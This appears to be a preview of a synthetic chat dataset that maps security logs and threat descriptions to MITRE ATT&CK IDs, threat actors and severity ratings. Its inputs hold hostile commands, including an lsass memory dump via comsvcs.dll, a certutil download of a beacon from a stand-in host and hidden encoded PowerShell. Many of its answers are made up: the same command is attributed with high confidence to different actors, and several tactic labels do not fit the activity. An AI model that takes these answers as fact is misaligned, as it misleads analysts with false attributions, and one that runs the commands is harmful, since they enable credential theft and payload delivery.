messages
listlengths
2
2
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-W9Q6YCODFX)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection, Persistence, Execution", "role": "user" }, { "c...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Olympic Destroyer uses PsExec to interact with the ADMIN$ network share to execute commands on remote systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.002\"]}", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Xbash can perform port scanning of TCP and UDP ports.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1046\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: This account modification may immediately follow Create Account or other malicious account activity.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098\", \"T1098.003\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Enforce the principle of least privilege by limiting privileges of user accounts so only authorized accounts can modify the web directory.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 595 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Mythic supports WebSocket and TCP-based C2 profiles.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1095\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1045 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.187.236.227", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniqu...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Backdoor.Oldrea writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-DMPXK2K59S)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Execution, Collection", "role": "user" }, { "c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1346 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.88.123.196", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0008\"], \"technique...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The C2 server used by XTunnel provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\":...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.185.79.87", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1546...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spide...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2342 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.146.115.25", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-V94J6D9DD2)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Persistence, Lateral Movement", "role": "user" }, { ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2697 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.174.255.64", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2609 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.99.162.89", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-S7T4AMR0L9)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.6.202.193", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0043\"], \"techniques\": [\"T1531\"]}...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.171.242.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0003\"], \"techniques\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.114.159.185", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0009\", \"TA0002\"], \"techniq...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: MuddyWater has used cmd.exe net user /domain to enumerate domain users.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087.002\", \"T1087\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.6.46.235", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0011\", \...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: It has also used the Registry entry HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn \"%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe\" to establish persistence.", "role": "user" }, { "content": "{\"tactic...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-5Y4SG4D7XT)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Collection, Lateral Movement", "role": "user" }, { "c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Diavol has a ENMDSKS command to enumerates available network shares.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1135\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-PU03GYKEXX)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence, Discovery", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.109.18.8", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1484...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.28.130.84", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0003\"], \"techniques\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-M4ZRWRC3NI)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection, Persistence", "role": "user" }, { "content": "{\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", "role": "a...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ramsay can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T156...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ramsay has used base64 to encode its C2 traffic.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.", "role": "use...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.137.145.138", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0040\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-QBLKTDXXQS)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Discovery, Reconnaissance", "role": "user" }, { "content": "{\"sever...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-M6SIIURZAZ)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.48.66.247", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0007...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-CISR32OBNZ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"H...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-ECS4SNP1OB)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2534 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.", "role": "user" }, { "content": "{\"tact...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Tropic Trooper has lured victims into executing malware via malicious e-mail attachments.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}", "r...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-QJG2S5BVET)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access, Privilege Escalation, Defense Evasion", "role": "user...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.142.166.73", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2008 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-2TQF89WJD5)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Collection", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Koadic can identify logged in users across the domain and views user sessions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: JPIN can obtain system information such as OS version and disk space.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-UFHX4AMPJT)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Defense Evasion, Command and Control", "role": "user...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-BMK5WF5PPZ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Attor can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.", "role": "user" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for newly constructed pods that may deploy a container into an environment to facilitate execution or evade defenses.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0005\"], \"te...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-C88TIDHEXU)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Execution", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-0ELU9LP42H)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2957 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.180.247.32", "role": "user" }, { "content": "{\"tactics\": [\"TA0006...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": \"High\"}...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Mustang Panda has used ipconfig and arp to determine network configuration information.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.53.185.90", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.165.219.71", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0043\", ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for unexpected deletion of a cloud storage infrastructure, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket.", "role": "u...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.37.154.13", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-N6F0FF5I6V)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Credential Access", "role": "user" }, { ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Extra scrutiny should be placed on suspicious modification of Registry keys such as COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH by command line tools like wmic.exe, setx.exe, and Reg.", "role": "user" }, { "co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1049 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.36.33.121", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0004...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.26.160.42", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0007\", \"TA0005\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-VRE6TBWEJX)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2086 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.116.104.220", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA00...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Takes screenshots when recording VoiceIP app audio", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\", \"T1123\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-FYJB8BKINF)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Collection", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-PPY71FB98E)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact, Initial Access", "role": "user" }, { "content": "{\"sev...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-X67Q32QUVY)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\", \"bu...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Pand...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-2QW95RB3C9)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Extreme...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1424 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confiden...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-0GWKOCBGAL)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Reconnaissance, Discovery", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-NTDZ24AMU3)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Execution", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2147 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.161.93.196", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"tec...